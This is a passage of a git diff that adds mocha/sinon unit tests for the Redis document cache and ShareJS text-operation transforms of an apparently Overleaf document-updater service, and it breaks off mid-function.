this.unflushed_time, + this.lastUpdatedAt, + this.lastUpdatedBy, + this.historyRangesSupport, + this.resolvedCommentIds + ) + }) + + it('should not log any errors', function () { + this.logger.error.calledWith().should.equal(false) + }) + }) + + describe('with a corrupted document', function () { + beforeEach(function () { + this.badHash = 'INVALID-HASH-VALUE' + this.rclient.mget = sinon + .stub() + .yields(null, [ + this.jsonlines, + this.version, + this.badHash, + this.project_id, + this.json_ranges, + ]) + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + it('should log a hash error', function () { + this.logger.error.calledWith().should.equal(true) + }) + + it('should return the document', function () { + this.callback + .calledWith(null, this.lines, this.version, this.ranges) + .should.equal(true) + }) + }) + + describe('with a slow request to redis', function () { + beforeEach(function () { + this.clock = sinon.useFakeTimers() + this.rclient.mget = (...args) => { + const cb = args.pop() + this.clock.tick(6000) + cb(null, [ + this.jsonlines, + this.version, + this.another_project_id, + this.json_ranges, + this.pathname, + this.unflushed_time, + ]) + } + + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + afterEach(function () { + this.clock.restore() + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('getDoc with an invalid project id', function () { + beforeEach(function () { + this.another_project_id = 'project-id-456' + this.rclient.mget = sinon + .stub() + .yields(null, [ + this.jsonlines, + this.version, + this.hash, + this.another_project_id, + this.json_ranges, + this.pathname, + this.unflushed_time, + ]) + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + }) + + describe('with history ranges support', function () { + beforeEach(function () { + this.rclient.sismember + .withArgs('HistoryRangesSupport', this.docId) + .yields(null, 1) + this.RedisManager.getDoc(this.project_id, this.docId, this.callback) + }) + + it('should return the document with the history ranges flag set', function () { + this.callback.should.have.been.calledWithExactly( + null, + this.lines, + this.version, + this.ranges, + this.pathname, + this.projectHistoryId, + this.unflushed_time, + this.lastUpdatedAt, + this.lastUpdatedBy, + true, + this.resolvedCommentIds + ) + }) + }) + }) + + describe('getPreviousDocOpsTests', function () { + describe('with a start and an end value', function () { + beforeEach(function () { + this.first_version_in_redis = 30 + this.version = 70 + this.length = this.version - this.first_version_in_redis + this.start = 50 + this.end = 60 + this.ops = [{ mock: 'op-1' }, { mock: 'op-2' }] + this.jsonOps = this.ops.map(op => JSON.stringify(op)) + this.rclient.llen = sinon.stub().callsArgWith(1, null, this.length) + this.rclient.get = sinon + .stub() + .callsArgWith(1, null, this.version.toString()) + this.rclient.lrange = sinon.stub().callsArgWith(3, null, this.jsonOps) + this.RedisManager.getPreviousDocOps( + this.docId, + this.start, + this.end, + this.callback + ) + }) + + it('should get the length of the existing doc ops', function () { + this.rclient.llen.calledWith(`DocOps:${this.docId}`).should.equal(true) + }) + + it('should get the current version of the doc', function () { + this.rclient.get + .calledWith(`DocVersion:${this.docId}`) + .should.equal(true) + }) + + it('should get the appropriate docs ops', function () { + this.rclient.lrange + .calledWith( + `DocOps:${this.docId}`, + this.start - this.first_version_in_redis, + this.end - this.first_version_in_redis + ) + .should.equal(true) + }) + + it('should return the docs with the doc ops deserialized', function () { + this.callback.calledWith(null, this.ops).should.equal(true) + }) + }) + + describe('with an end value of -1', function () { + beforeEach(function () { + this.first_version_in_redis = 30 + this.version = 70 + this.length = this.version - this.first_version_in_redis + this.start = 50 + this.end = -1 + this.ops = [{ mock: 'op-1' }, { mock: 'op-2' }] + this.jsonOps = this.ops.map(op => JSON.stringify(op)) + this.rclient.llen = sinon.stub().callsArgWith(1, null, this.length) + this.rclient.get = sinon + .stub() + .callsArgWith(1, null, this.version.toString()) + this.rclient.lrange = sinon.stub().callsArgWith(3, null, this.jsonOps) + this.RedisManager.getPreviousDocOps( + this.docId, + this.start, + this.end, + this.callback + ) + }) + + it('should get the appropriate docs ops to the end of list', function () { + this.rclient.lrange + .calledWith( + `DocOps:${this.docId}`, + this.start - this.first_version_in_redis, + -1 + ) + .should.equal(true) + }) + + it('should return the docs with the doc ops deserialized', function () { + this.callback.calledWith(null, this.ops).should.equal(true) + }) + }) + + describe('when the requested range is not in Redis', function () { + beforeEach(function () { + this.first_version_in_redis = 30 + this.version = 70 + this.length = this.version - this.first_version_in_redis + this.start = 20 + this.end = -1 + this.ops = [{ mock: 'op-1' }, { mock: 'op-2' }] + this.jsonOps = this.ops.map(op => JSON.stringify(op)) + this.rclient.llen = sinon.stub().callsArgWith(1, null, this.length) + this.rclient.get = sinon + .stub() + .callsArgWith(1, null, this.version.toString()) + this.rclient.lrange = sinon.stub().callsArgWith(3, null, this.jsonOps) + this.RedisManager.getPreviousDocOps( + this.docId, + this.start, + this.end, + this.callback + ) + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Errors.OpRangeNotAvailableError)) + .should.equal(true) + }) + + it('should send details for metrics', function () { + this.callback.should.have.been.calledWith( + sinon.match({ + info: { + firstVersionInRedis: this.first_version_in_redis, + version: this.version, + ttlInS: this.RedisManager.DOC_OPS_TTL, + }, + }) + ) + }) + + it('should log out the problem as a debug message', function () { + this.logger.debug.called.should.equal(true) + }) + }) + + describe('with a slow request to redis', function () { + beforeEach(function () { + this.first_version_in_redis = 30 + this.version = 70 + this.length = this.version - this.first_version_in_redis + this.start = 50 + this.end = 60 + this.ops = [{ mock: 'op-1' }, { mock: 'op-2' }] + this.jsonOps = this.ops.map(op => JSON.stringify(op)) + this.rclient.llen = sinon.stub().callsArgWith(1, null, this.length) + this.rclient.get = sinon + .stub() + .callsArgWith(1, null, this.version.toString()) + this.clock = sinon.useFakeTimers() + this.rclient.lrange = (key, start, end, cb) => { + this.clock.tick(6000) + cb(null, this.jsonOps) + } + this.RedisManager.getPreviousDocOps( + this.docId, + this.start, + this.end, + this.callback + ) + }) + + afterEach(function () { + this.clock.restore() + }) + + it('should return an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) + + describe('updateDocument', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three', 'これは'] + this.ops = [{ op: [{ i: 'foo', p: 4 }] }, { op: [{ i: 'bar', p: 8 }] }] + this.version = 42 + this.hash = crypto + .createHash('sha1') + .update(JSON.stringify(this.lines), 'utf8') + .digest('hex') + this.ranges = { comments: 'mock', entries: 'mock' } + this.updateMeta = { user_id: 'last-author-fake-id' } + this.doc_update_list_length = sinon.stub() + this.project_update_list_length = sinon.stub() + + this.RedisManager.getDocVersion = sinon.stub() + this.multi.mset = sinon.stub() + this.multi.set = sinon.stub() + this.multi.rpush = sinon.stub() + this.multi.expire = sinon.stub() + this.multi.ltrim = sinon.stub() + this.multi.del = sinon.stub() + this.multi.exec = sinon + .stub() + .callsArgWith(0, null, [ + null, + null, + null, + null, + this.doc_update_list_length, + null, + null, + ]) + }) + + describe('with a consistent version', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should get the current doc version to check for consistency', function () { + this.RedisManager.getDocVersion + .calledWith(this.docId) + .should.equal(true) + }) + + it('should set most details in a single MSET call', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: JSON.stringify(this.ranges), + [`lastUpdatedAt:${this.docId}`]: Date.now(), + [`lastUpdatedBy:${this.docId}`]: 'last-author-fake-id', + }) + .should.equal(true) + }) + + it('should set the unflushed time', function () { + this.multi.set + .calledWith(`UnflushedTime:${this.docId}`, Date.now(), 'NX') + .should.equal(true) + }) + + it('should push the doc op into the doc ops list', function () { + this.multi.rpush + .calledWith( + `DocOps:${this.docId}`, + JSON.stringify(this.ops[0]), + JSON.stringify(this.ops[1]) + ) + .should.equal(true) + }) + + it('should renew the expiry ttl on the doc ops array', function () { + this.multi.expire + .calledWith(`DocOps:${this.docId}`, this.RedisManager.DOC_OPS_TTL) + .should.equal(true) + }) + + it('should truncate the list to 100 members', function () { + this.multi.ltrim + .calledWith( + `DocOps:${this.docId}`, + -this.RedisManager.DOC_OPS_MAX_LENGTH, + -1 + ) + .should.equal(true) + }) + + it('should call the callback', function () { + this.callback.should.have.been.called + }) + + it('should not log any errors', function () { + this.logger.error.calledWith().should.equal(false) + }) + + describe('with a doc using project history only', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should call the callback', function () { + this.callback.should.have.been.called + }) + }) + }) + + describe('with an inconsistent version', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length - 1) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should not call multi.exec', function () { + this.multi.exec.called.should.equal(false) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('with no updates', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + [], + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should set the unflushed time (potential ranges changes)', function () { + this.multi.set + .calledWith(`UnflushedTime:${this.docId}`, Date.now(), 'NX') + .should.equal(true) + }) + + it('should not try to enqueue doc updates', function () { + this.multi.rpush.called.should.equal(false) + }) + + it('should still set the doclines', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: JSON.stringify(this.ranges), + [`lastUpdatedAt:${this.docId}`]: Date.now(), + [`lastUpdatedBy:${this.docId}`]: 'last-author-fake-id', + }) + .should.equal(true) + }) + }) + + describe('with empty ranges', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + {}, + this.updateMeta, + this.callback + ) + }) + + it('should set empty ranges', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: null, + [`lastUpdatedAt:${this.docId}`]: Date.now(), + [`lastUpdatedBy:${this.docId}`]: 'last-author-fake-id', + }) + .should.equal(true) + }) + }) + + describe('with null bytes in the serialized doc lines', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.stringifyStub = sinon + .stub(JSON, 'stringify') + .callsFake(() => '["bad bytes! \u0000 <- here"]') + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + afterEach(function () { + this.stringifyStub.restore() + }) + + it('should log an error', function () { + this.logger.error.called.should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('with ranges that are too big', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager._serializeRanges = sinon + .stub() + .yields(new Error('ranges are too large')) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + this.updateMeta, + this.callback + ) + }) + + it('should log an error', function () { + this.logger.error.called.should.equal(true) + }) + + it('should call the callback with the error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('without user id from meta', function () { + beforeEach(function () { + this.RedisManager.getDocVersion + .withArgs(this.docId) + .yields(null, this.version - this.ops.length) + this.RedisManager.updateDocument( + this.project_id, + this.docId, + this.lines, + this.version, + this.ops, + this.ranges, + {}, + this.callback + ) + }) + + it('should unset last updater', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: JSON.stringify(this.ranges), + [`lastUpdatedAt:${this.docId}`]: Date.now(), + [`lastUpdatedBy:${this.docId}`]: undefined, + }) + .should.equal(true) + }) + }) + }) + + describe('putDocInMemory', function () { + beforeEach(function () { + this.multi.mset = sinon.stub() + this.multi.sadd = sinon.stub() + this.multi.del = sinon.stub() + this.multi.exists = sinon.stub() + this.multi.exec.onCall(0).yields(null, [0]) + this.rclient.sadd = sinon.stub().yields() + this.lines = ['one', 'two', 'three', 'これは'] + this.version = 42 + this.hash = crypto + .createHash('sha1') + .update(JSON.stringify(this.lines), 'utf8') + .digest('hex') + this.ranges = { comments: 'mock', entries: 'mock' } + this.resolvedCommentIds = ['comment-1'] + this.pathname = '/a/b/c.tex' + }) + + describe('with non-empty ranges', function () { + beforeEach(function (done) { + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + done + ) + }) + + it('should set all the details in a single MSET call', function () { + this.multi.mset + .calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`ProjectId:${this.docId}`]: this.project_id, + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: JSON.stringify(this.ranges), + [`Pathname:${this.docId}`]: this.pathname, + [`ProjectHistoryId:${this.docId}`]: this.projectHistoryId, + }) + .should.equal(true) + }) + + it('should add the docId to the project set', function () { + this.multi.sadd + .calledWith(`DocsIn:${this.project_id}`, this.docId) + .should.equal(true) + }) + + it('should not log any errors', function () { + this.logger.error.calledWith().should.equal(false) + }) + + it('should remove the document from the HistoryRangesSupport set in Redis', function () { + this.rclient.srem.should.have.been.calledWith( + 'HistoryRangesSupport', + this.docId + ) + }) + + it('should not store the resolved comments in Redis', function () { + this.multi.sadd.should.not.have.been.calledWith( + `ResolvedCommentIds:${this.docId}` + ) + }) + }) + + describe('with empty ranges', function () { + beforeEach(function (done) { + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + {}, + [], + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + done + ) + }) + + it('should unset ranges', function () { + this.multi.mset.should.have.been.calledWith({ + [`doclines:${this.docId}`]: JSON.stringify(this.lines), + [`ProjectId:${this.docId}`]: this.project_id, + [`DocVersion:${this.docId}`]: this.version, + [`DocHash:${this.docId}`]: this.hash, + [`Ranges:${this.docId}`]: null, + [`Pathname:${this.docId}`]: this.pathname, + [`ProjectHistoryId:${this.docId}`]: this.projectHistoryId, + }) + }) + }) + + describe('with null bytes in the serialized doc lines', function () { + beforeEach(function () { + this.stringifyStub = sinon + .stub(JSON, 'stringify') + .callsFake(() => '["bad bytes! \u0000 <- here"]') + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + this.callback + ) + }) + + afterEach(function () { + this.stringifyStub.restore() + }) + + it('should log an error', function () { + this.logger.error.called.should.equal(true) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('with ranges that are too big', function () { + beforeEach(function () { + this.RedisManager._serializeRanges = sinon + .stub() + .yields(new Error('ranges are too large')) + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + this.callback + ) + }) + + it('should log an error', function () { + this.logger.error.called.should.equal(true) + }) + + it('should call the callback with the error', function () { + this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + + describe('with history ranges support', function () { + beforeEach(function (done) { + this.historyRangesSupport = true + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + done + ) + }) + + it('should add the document to the HistoryRangesSupport set in Redis', function () { + this.rclient.sadd.should.have.been.calledWith( + 'HistoryRangesSupport', + this.docId + ) + }) + + it('should store the resolved comments in Redis', function () { + this.multi.del.should.have.been.calledWith( + `ResolvedCommentIds:${this.docId}` + ) + this.multi.sadd.should.have.been.calledWith( + `ResolvedCommentIds:${this.docId}`, + ...this.resolvedCommentIds + ) + }) + }) + + describe('when the project is blocked', function () { + beforeEach(function (done) { + this.multi.exec.onCall(0).yields(null, [1]) + this.RedisManager.putDocInMemory( + this.project_id, + this.docId, + this.lines, + this.version, + this.ranges, + this.resolvedCommentIds, + this.pathname, + this.projectHistoryId, + this.historyRangesSupport, + err => { + this.error = err + done() + } + ) + }) + + it('should throw an error', function () { + expect(this.error.message).to.equal('Project blocked from loading docs') + }) + + it('should not store the doc', function () { + expect(this.multi.mset).to.not.have.been.called + }) + }) + }) + + describe('removeDocFromMemory', function () { + beforeEach(function (done) { + this.multi.strlen = sinon.stub() + this.multi.del = sinon.stub() + this.multi.srem = sinon.stub() + this.multi.exec.yields() + this.RedisManager.removeDocFromMemory(this.project_id, this.docId, done) + }) + + it('should check the length of the current doclines', function () { + this.multi.strlen.calledWith(`doclines:${this.docId}`).should.equal(true) + }) + + it('should delete the details in a singe call', function () { + this.multi.del + .calledWith( + `doclines:${this.docId}`, + `ProjectId:${this.docId}`, + `DocVersion:${this.docId}`, + `DocHash:${this.docId}`, + `Ranges:${this.docId}`, + `Pathname:${this.docId}`, + `ProjectHistoryId:${this.docId}`, + `UnflushedTime:${this.docId}`, + `lastUpdatedAt:${this.docId}`, + `lastUpdatedBy:${this.docId}`, + `ResolvedCommentIds:${this.docId}` + ) + .should.equal(true) + }) + + it('should remove the docId from the project set', function () { + this.multi.srem + .calledWith(`DocsIn:${this.project_id}`, this.docId) + .should.equal(true) + }) + + it('should remove the docId from the HistoryRangesSupport set', function () { + this.rclient.srem.should.have.been.calledWith( + 'HistoryRangesSupport', + this.docId + ) + }) + }) + + describe('clearProjectState', function () { + beforeEach(function (done) { + this.rclient.del = sinon.stub().callsArg(1) + this.RedisManager.clearProjectState(this.project_id, done) + }) + + it('should delete the project state', function () { + this.rclient.del + .calledWith(`ProjectState:${this.project_id}`) + .should.equal(true) + }) + }) + + describe('renameDoc', function () { + beforeEach(function () { + this.rclient.rpush = sinon.stub().yields() + this.rclient.set = sinon.stub().yields() + this.update = { + id: this.docId, + pathname: (this.pathname = 'pathname'), + newPathname: (this.newPathname = 'new-pathname'), + } + }) + + describe('the document is cached in redis', function () { + beforeEach(function () { + this.RedisManager.getDoc = sinon + .stub() + .callsArgWith(2, null, 'lines', 'version') + this.RedisManager.renameDoc( + this.project_id, + this.docId, + this.userId, + this.update, + this.projectHistoryId, + this.callback + ) + }) + + it('update the cached pathname', function () { + this.rclient.set + .calledWith(`Pathname:${this.docId}`, this.newPathname) + .should.equal(true) + }) + }) + + describe('the document is not cached in redis', function () { + beforeEach(function () { + this.RedisManager.getDoc = sinon + .stub() + .callsArgWith(2, null, null, null) + this.RedisManager.renameDoc( + this.project_id, + this.docId, + this.userId, + this.update, + this.projectHistoryId, + this.callback + ) + }) + + it('does not update the cached pathname', function () { + this.rclient.set.called.should.equal(false) + }) + }) + + describe('getDocVersion', function () { + beforeEach(function () { + this.version = 12345 + this.rclient.mget = sinon + .stub() + .withArgs(`DocVersion:${this.docId}`) + .callsArgWith(1, null, [`${this.version}`]) + this.RedisManager.getDocVersion(this.docId, this.callback) + }) + + it('should return the document version', function () { + this.callback.calledWithExactly(null, this.version).should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ShareJS/TextTransformTests.js b/services/document-updater/test/unit/js/ShareJS/TextTransformTests.js new file mode 100644 index 0000000..a4fe5d7 --- /dev/null +++ b/services/document-updater/test/unit/js/ShareJS/TextTransformTests.js @@ -0,0 +1,444 @@ +/* eslint-disable + mocha/no-identical-title, + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS202: Simplify dynamic range loops + * DS205: Consider reworking code to avoid use of IIFEs + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const text = require('../../../../app/js/sharejs/types/text') +const RangesTracker = require('@overleaf/ranges-tracker') + +describe('ShareJS text type', function () { + beforeEach(function () { + return (this.t = 'mock-thread-id') + }) + + describe('transform', function () { + describe('insert / insert', function () { + it('with an insert before', function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 9 }, { i: 'bar', p: 3 }) + return dest.should.deep.equal([{ i: 'foo', p: 12 }]) + }) + + it('with an insert after', function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { i: 'bar', p: 9 }) + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + + it("with an insert at the same place with side == 'right'", function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { i: 'bar', p: 3 }, 'right') + return dest.should.deep.equal([{ i: 'foo', p: 6 }]) + }) + + return it("with an insert at the same place with side == 'left'", function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { i: 'bar', p: 3 }, 'left') + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + }) + + describe('insert / delete', function () { + it('with a delete before', function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 9 }, { d: 'bar', p: 3 }) + return dest.should.deep.equal([{ i: 'foo', p: 6 }]) + }) + + it('with a delete after', function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { d: 'bar', p: 9 }) + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + + it("with a delete at the same place with side == 'right'", function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 3 }, { d: 'bar', p: 3 }, 'right') + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + + return it("with a delete at the same place with side == 'left'", function () { + const dest = [] + + text._tc(dest, { i: 'foo', p: 3 }, { d: 'bar', p: 3 }, 'left') + return dest.should.deep.equal([{ i: 'foo', p: 3 }]) + }) + }) + + describe('delete / insert', function () { + it('with an insert before', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 9 }, { i: 'bar', p: 3 }) + return dest.should.deep.equal([{ d: 'foo', p: 12 }]) + }) + + it('with an insert after', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { i: 'bar', p: 9 }) + return dest.should.deep.equal([{ d: 'foo', p: 3 }]) + }) + + it("with an insert at the same place with side == 'right'", function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { i: 'bar', p: 3 }, 'right') + return dest.should.deep.equal([{ d: 'foo', p: 6 }]) + }) + + it("with an insert at the same place with side == 'left'", function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { i: 'bar', p: 3 }, 'left') + return dest.should.deep.equal([{ d: 'foo', p: 6 }]) + }) + + return it('with a delete that overlaps the insert location', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { i: 'bar', p: 4 }) + return dest.should.deep.equal([ + { d: 'f', p: 3 }, + { d: 'oo', p: 6 }, + ]) + }) + }) + + describe('delete / delete', function () { + it('with a delete before', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 9 }, { d: 'bar', p: 3 }) + return dest.should.deep.equal([{ d: 'foo', p: 6 }]) + }) + + it('with a delete after', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { d: 'bar', p: 9 }) + return dest.should.deep.equal([{ d: 'foo', p: 3 }]) + }) + + it('with deleting the same content', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 3 }, { d: 'foo', p: 3 }, 'right') + return dest.should.deep.equal([]) + }) + + it('with the delete overlapping before', function () { + const dest = [] + text._tc(dest, { d: 'foobar', p: 3 }, { d: 'abcfoo', p: 0 }, 'right') + return dest.should.deep.equal([{ d: 'bar', p: 0 }]) + }) + + it('with the delete overlapping after', function () { + const dest = [] + text._tc(dest, { d: 'abcfoo', p: 3 }, { d: 'foobar', p: 6 }) + return dest.should.deep.equal([{ d: 'abc', p: 3 }]) + }) + + it('with the delete overlapping the whole delete', function () { + const dest = [] + text._tc(dest, { d: 'abcfoo123', p: 3 }, { d: 'foo', p: 6 }) + return dest.should.deep.equal([{ d: 'abc123', p: 3 }]) + }) + + return it('with the delete inside the whole delete', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 6 }, { d: 'abcfoo123', p: 3 }) + return dest.should.deep.equal([]) + }) + }) + + describe('comment / insert', function () { + it('with an insert before', function () { + const dest = [] + text._tc(dest, { c: 'foo', p: 9, t: this.t }, { i: 'bar', p: 3 }) + return dest.should.deep.equal([{ c: 'foo', p: 12, t: this.t }]) + }) + + it('with an insert after', function () { + const dest = [] + text._tc(dest, { c: 'foo', p: 3, t: this.t }, { i: 'bar', p: 9 }) + return dest.should.deep.equal([{ c: 'foo', p: 3, t: this.t }]) + }) + + it('with an insert at the left edge', function () { + const dest = [] + text._tc(dest, { c: 'foo', p: 3, t: this.t }, { i: 'bar', p: 3 }) + // RangesTracker doesn't inject inserts into comments on edges, so neither should we + return dest.should.deep.equal([{ c: 'foo', p: 6, t: this.t }]) + }) + + it('with an insert at the right edge', function () { + const dest = [] + text._tc(dest, { c: 'foo', p: 3, t: this.t }, { i: 'bar', p: 6 }) + // RangesTracker doesn't inject inserts into comments on edges, so neither should we + return dest.should.deep.equal([{ c: 'foo', p: 3, t: this.t }]) + }) + + return it('with an insert in the middle', function () { + const dest = [] + text._tc(dest, { c: 'foo', p: 3, t: this.t }, { i: 'bar', p: 5 }) + return dest.should.deep.equal([{ c: 'fobaro', p: 3, t: this.t }]) + }) + }) + + describe('comment / delete', function () { + it('with a delete before', function () { + const dest = [] + text._tc(dest, { c: 'foo', p: 9, t: this.t }, { d: 'bar', p: 3 }) + return dest.should.deep.equal([{ c: 'foo', p: 6, t: this.t }]) + }) + + it('with a delete after', function () { + const dest = [] + text._tc(dest, { c: 'foo', p: 3, t: this.t }, { i: 'bar', p: 9 }) + return dest.should.deep.equal([{ c: 'foo', p: 3, t: this.t }]) + }) + + it('with a delete overlapping the comment content before', function () { + const dest = [] + text._tc(dest, { c: 'foobar', p: 6, t: this.t }, { d: '123foo', p: 3 }) + return dest.should.deep.equal([{ c: 'bar', p: 3, t: this.t }]) + }) + + it('with a delete overlapping the comment content after', function () { + const dest = [] + text._tc(dest, { c: 'foobar', p: 6, t: this.t }, { d: 'bar123', p: 9 }) + return dest.should.deep.equal([{ c: 'foo', p: 6, t: this.t }]) + }) + + it('with a delete overlapping the comment content in the middle', function () { + const dest = [] + text._tc(dest, { c: 'foo123bar', p: 6, t: this.t }, { d: '123', p: 9 }) + return dest.should.deep.equal([{ c: 'foobar', p: 6, t: this.t }]) + }) + + return it('with a delete overlapping the whole comment', function () { + const dest = [] + text._tc(dest, { c: 'foo', p: 6, t: this.t }, { d: '123foo456', p: 3 }) + return dest.should.deep.equal([{ c: '', p: 3, t: this.t }]) + }) + }) + + describe('comment / insert', function () { + return it('should not do anything', function () { + const dest = [] + text._tc(dest, { i: 'foo', p: 6 }, { c: 'bar', p: 3 }) + return dest.should.deep.equal([{ i: 'foo', p: 6 }]) + }) + }) + + describe('comment / delete', function () { + return it('should not do anything', function () { + const dest = [] + text._tc(dest, { d: 'foo', p: 6 }, { c: 'bar', p: 3 }) + return dest.should.deep.equal([{ d: 'foo', p: 6 }]) + }) + }) + + return describe('comment / comment', function () { + return it('should not do anything', function () { + const dest = [] + text._tc(dest, { c: 'foo', p: 6 }, { c: 'bar', p: 3 }) + return dest.should.deep.equal([{ c: 'foo', p: 6 }]) + }) + }) + }) + + describe('apply', function () { + it('should apply an insert', function () { + return text.apply('foo', [{ i: 'bar', p: 2 }]).should.equal('fobaro') + }) + + it('should apply a delete', function () { + return text + .apply('foo123bar', [{ d: '123', p: 3 }]) + .should.equal('foobar') + }) + + it('should do nothing with a comment', function () { + return text + .apply('foo123bar', [{ c: '123', p: 3 }]) + .should.equal('foo123bar') + }) + + it('should throw an error when deleted content does not match', function () { + return (() => text.apply('foo123bar', [{ d: '456', p: 3 }])).should.throw( + Error + ) + }) + + return it('should throw an error when comment content does not match', function () { + return (() => text.apply('foo123bar', [{ c: '456', p: 3 }])).should.throw( + Error + ) + }) + }) + + return describe('applying ops and comments in different orders', function () { + return it('should not matter which op or comment is applied first', function () { + let length, p + let asc, end + let asc1, end1 + let asc3, end3 + const transform = function (op1, op2, side) { + const d = [] + text._tc(d, op1, op2, side) + return d + } + + const applySnapshot = (snapshot, op) => text.apply(snapshot, op) + + const applyRanges = function (rangesTracker, ops) { + for (const op of Array.from(ops)) { + rangesTracker.applyOp(op, {}) + } + return rangesTracker + } + + const commentsEqual = function (comments1, comments2) { + if (comments1.length !== comments2.length) { + return false + } + comments1.sort((a, b) => { + if (a.offset - b.offset === 0) { + return a.length - b.length + } else { + return a.offset - b.offset + } + }) + comments2.sort((a, b) => { + if 